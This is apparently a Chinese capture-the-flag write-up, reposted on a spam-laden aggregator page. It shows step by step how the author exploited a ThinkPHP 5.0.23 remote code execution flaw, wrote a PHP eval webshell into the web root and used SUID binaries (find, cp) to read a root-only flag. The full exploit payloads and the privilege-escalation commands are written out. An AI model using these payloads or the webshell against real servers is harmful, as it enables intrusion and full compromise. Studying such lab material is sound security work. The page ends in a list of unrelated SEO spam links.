当前位置: 首页 > news >正文

通辽网站制作公司搜狗网站

通辽网站制作公司,搜狗网站,济南优化网站价格,flash网站欣赏前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难 Final 考点: ThinkPHP 5.0.23 RCE一句话木马上传SUID提权(find) 解题: 首先页面就给了ThinkPHP V5, 那无非考…

 前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难

Final

考点:

ThinkPHP 5.0.23 RCE+一句话木马上传+SUID提权(find)

 解题:

首先页面就给了ThinkPHP V5, 那无非考的就是ThinkPHP版本的漏洞 ,经过信息收集发现确实是ThinkPHP 5.0.23漏洞 下篇文章即有现成的讲解:

https://blog.csdn.net/Lucky1youzi/article/details/128740552

我们按照他说的做,首先抓包进行传参

GET:index.php?s=captcha
POST:_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

 这个参数1 是可以进行修改的,竟然能出现phpinfo页面 ,那我们就可以进行RCE,但是我们发现命令执行参数全被ban了,可能是权限的问题 ,我们上传一句话木马

_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo%20'<?php%20eval($_POST['cmd']);?>'%20>%20/var/www/public/1.php

然后蚁剑连接后发现根目录下存在flag文件

但是里面内容没有 ,一眼没权限,我们去终端看看

我们发现 -rwx-----意思就是只能文件主的权限使用 意思就是最高权限才能读

尝试chmod无果

然后我们这里就查看具有SUID权限的命令:

find / -user root -perm -4000 -print 2>/dev/null

这个利用find进行提权可以访问

https://blog.csdn.net/rlenew/article/details/111873682

 

我们使用cp命令SUID提权读取Flag:

cp /flag_dd3f6380aa0d /dev/stdout

 / dev / stdout是—个特殊的文件,代表标准输出。

http://www.tj-hxxt.cn/news/62349.html

相关文章:

  • 网站排名优化怎么做云南seo简单整站优化
  • 可以上传高清图片的网站并做外链智慧软文发布系统
  • 做国外搞笑网站windows优化大师要钱
  • 温州 网站长春关键词优化平台
  • 杭州网站建设哪家好想学手艺在哪里可以培训
  • 做司法考试题目的网站国外比较开放的社交软件
  • 在哪些网站可以发布推广信息互联网广告销售是做什么的
  • 在什么网站上做兼职靠谱吗百度官网电话
  • 自己做一个appseo服务是什么意思
  • 金湖县建设工程质量监督网站找个免费的网站
  • 自己建设网站怎么做百度风云榜游戏排行榜
  • 设计网站评分标准沈阳网络关键词排名
  • 织梦模板网站怎么备份网络广告营销策略
  • 51传奇网页游戏如何提高搜索引擎优化
  • 老薛主机wordpress设置百度seo点击工具
  • 网站备案应该怎么做如何创建网站教程
  • 软件开发生命周期东莞网络优化哪家好
  • 外贸手机商城网站建设 深圳百度官方网站首页
  • 兼职做ppt是哪个网站网络推广策划方案怎么写
  • 网站免费优秀的软文广告欣赏
  • 广州网站建设懂你所需荥阳网站优化公司
  • 报告长官夫人在捉鬼优化大师官方网站
  • 政府网站查询企业网络营销业务
  • 做同城网站最赚钱营销型网站建设设计
  • 武汉模板建站源码深圳市文化广电旅游体育局
  • 网站代码免费下载兰州seo优化公司
  • asp网站配置跨境电商靠谱吗
  • vue网站开发实例seo外链建设的方法
  • 绵阳新农网的网站是哪个公司做的济南seo整站优化价格
  • 总部在北京的互联网企业快速排名seo